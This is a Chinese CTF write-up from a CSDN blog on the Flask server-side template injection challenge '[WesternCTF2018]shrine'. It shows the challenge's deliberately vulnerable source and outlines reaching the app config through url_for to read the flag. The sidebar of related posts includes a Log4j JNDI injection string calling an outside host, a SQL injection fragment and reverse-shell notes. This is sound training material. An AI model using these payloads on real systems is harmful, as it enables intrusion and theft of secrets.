BUU-WEB-[WesternCTF2018]shrine

最新推荐文章于 2023-01-17 22:12:02 发布
最新推荐文章于 2023-01-17 22:12:02 发布
阅读量197 收藏
点赞数
分类专栏: BUU-WEB 文章标签: flask SSTI漏洞 安全模板 配置信息 逻辑运算
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_24033605/article/details/116902465
版权

[WesternCTF2018]shrine

flask框架审计。

import flask 
import os 
app = flask.Flask(__name__) 
app.config['FLAG'] = os.environ.pop('FLAG') 
@app.route('/') 
def index(): 
	return open(__file__).read() 
@app.route('/shrine/') 
def shrine(shrine): 
	def safe_jinja(s): 
	s = s.replace('(', '').replace(')', '') 
	blacklist = ['config', 'self'] 
	return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s 
return flask.render_template_string(safe_jinja(shrine)) 
if __name__ == '__main__': app.run(debug=True)

根据源码猜测在/shrine/的网页下存在SSTI漏洞,于是尝试执行逻辑运算。
在这里插入图片描述
执行函数的黑名单有两个config和self。
不过python还有一些内置函数,比如url_for和get_flashed_messages。
在这里插入图片描述
然后根据配置,查看current_app的配置信息。
在这里插入图片描述
成功找到flag。

TzZzEZ-web
关注
专栏目录
【学习笔记18】buu [WesternCTF2018]shrine
weixin_43553654的博客
05-18 459
打开网站,查看源码看到下面的一串代码 import flask//flask模板,首先就想到了想到了之前我写的一篇flask模板ssti逃逸 import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG')//注册了一个名为FLAG的config,这里基本可以确定是flag。 @app.route('...
buu-[CFI-CTF 2018]IntroToPE
qaq517384的博客
04-10 385
解压为一个NET文件 程序为一个检验密码的程序 dnSpy打开,根据按钮搜索相关函数 过一遍发现 Q0ZJey5OZXRDI18xc19AdzNzMG0zfQ== base64解密即可 flag{.NetC#_1s_@w3s0m3}
web buuctf [WesternCTF2018]shrine
weixin_44214568的博客
04-04 1268
考点:模板注入(flask) 1.打开整理代码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') //显示代码 @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/') def shrine(shrine): def safe_jinja(
buuctf-[WesternCTF2018]shrine(小宇特详解)
小宇的web博客
02-26 1542
buuctf-[WesternCTF2018]shrine(小宇特详解) 1.先看题目 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') //注册了一个名为FLAG的config @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:
BUUCTF:[WesternCTF2018]shrine
qq_46230755的博客
12-30 269
打开网页是一题代码审计 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def safe_jinj
BUUCTF WEB SHRINE
qq_41696858的博客
12-23 411
依然是经典代码审计: import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @ app.route('/') def index(): return open(__file__).read() @ app.route('/shrine/') def shrine(shrine): def safe_jinja(s): s = s.replace(
渗透学习-CTF篇-web-BUUCTF
qq_43696276的博客
01-17 2236
随着学习的不断深入,为了防止自己忘记之前所学的内容,于是我决定再不断的向下学习的同时做一些ctf的题来唤醒自己的记忆!!
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
buu-[网鼎杯 2018]Comment
qaq517384的博客
10-13 316
进入题目 发帖时提示要登录,密码用bp跑出来是666 然后这个发帖形式很像上一题的二次注入,先构造sql语句,后面在留言界面输出 稍微试了一下,有问题的都发不出留言 在f12控制台发现这样一句话后,在url后添加.git被403禁止了,说明有git泄露 githack载下来的源码跟没载一样 <?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ header("Location: ./l
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
在本题目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
BUU-N1BOOK-Web
楼阁de猫的博客
12-11 1181
web入门[第一章 web入门]常见的信息搜集[第一章 web入门]粗心的小李 [第一章 web入门]常见的信息搜集 考查知识点: 1.常规文件:robots.txt 2.gedit备份文件 3.vim备份文件 首先看robots.txt: 访问一下这个文件得到flag1 再看一下原始文件ihdex.php,发现什么都没有,之前用dirsearch扫了很多东西出来,试了/.git发现也不对,这里就看到书上讲到了gedit备份文件,它是以 ~ 为后缀的,试试index.php~,有东西了,拿到flag
BUUCTF web writeup
热门推荐
stepone4ward的博客
09-11 2万+
buuctf题目的部分writeup,持续更新中
BUU-WEB-[HCTF 2018]admin
qq_24033605的博客
05-09 7378
[HCTF 2018]admin方法一:flask session欺骗方法二:Unicode欺骗 主页标题有一个超链接,点击去看一看。 啥也没找到,于是返回主页查看源码。发现一个登录的链接和一个注册的链接。 尝试先注册一个测试账号。 注释里提示我们没用admin账户登录。 查看源码,发现提供了四个操作的链接。 想要获取admin的账户,只可能是从两个方面入手,一个是注册时修改admin密码,另一个就是通过修改密码,修改admin的密码。 change功能里的源码中,提供了一个github地址。
BUUCTF-[SCTF2019]Flag Shop
qq_24033605的博客
11-04 4455
[SCTF2019]Flag Shop 简单看一下几个按钮的作用,buy flag是购买flag的按钮,但是当前的JinKela不够买不起,reset是重置按钮,work是工作按钮,可以赚取JinKela,但是每次只能赚取一小部分。(除非你足够闲,一直点到所需的数量然后购买flag) 这三个按钮干不成大事,目录扫描,扫到robots.txt 查看页面备份文件 这里可以看到源码~~(本菜狗没学过Ruby,哭了)~~ 问题不大,看到了JWT,先抓个包看一下, 找到了jkl的位置,但是缺少密钥对其进行加
BUUCTF-[MRCTF2020]Ezaudit
qq_24033605的博客
11-04 3288
[MRCTF2020]Ezaudit 扫描目录,发现www.zip可以下载到源码。 进行部分审计, 只有当username,password和private_key全部正确时,才会获取flag。 对于username和password,由于是sql查询,可以万能密码进行绕过,剩下的问题是获取private_key。 给出了获取public_key和private_key的函数,并且mt_rand函数是伪随机函数,只要获取种子值就都不是问题。 接下来我们要根据public_key反推出种子值。 首先转换字
BUUCTF-[b01lers2020]Life on Mars
qq_24033605的博客
11-04 2965
[b01lers2020]Life on Mars 审视了一下页面的功能,这几个功能键只能改变页面显示,连跳转都没有。扫描了一下,没有其他任何页面。这是猜想是不是框架漏洞。 利用了Bootstrap的漏洞也没用,只能抓包看一下,不抓不知道,一抓吓一跳 找到了sql注入的注入点,测试了一下,似乎存在waf,不能有空格,于是常规用/**/替换空格。 爆破数据库名 union/**/select/**/1,group_concat(SCHEMA_NAME)/**/from/**/information_s
[长安杯]web-shiro复现
qq_24033605的博客
01-12 2227
长安杯-shiro?复现 浏览器显示是springboot框架 登录伪造shiro,关键词为remeber-me shiro直接打,打不进去 springboot还可以写log4j漏洞,测试一下 jndi被过滤了 进行绕过 ${${::-j}ndi:rmi://py2hu7.ceye.io/exp} 成功接收到dnslog信息。 构建jndi反弹shell,这里反弹shell的命令需要bypass一下 在这里插入代码片 反弹的有点慢,但是可以成功反弹shell并拿取flag。 ...
BUUCTF-[红明谷CTF 2021]write_shell
qq_24033605的博客
11-02 544
[红明谷CTF 2021]write_shell 源码放出来了,直接进行代码审计: 从action出发,有两个功能,一是执行pwd,功能是显示当前目录,二是上传upload,通过data变量执行get传参,这里设置了一个waf,对data的内容进行了过滤。 首先进行pwd操作,查看当前目录: 接下来构建shell,这里过滤了php,所以使用短标签<?=?>,过滤了空格,使用\t替换,过滤了eval,使用`执行命令打开根目录下所有文件: /?action=upload&data=&lt
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值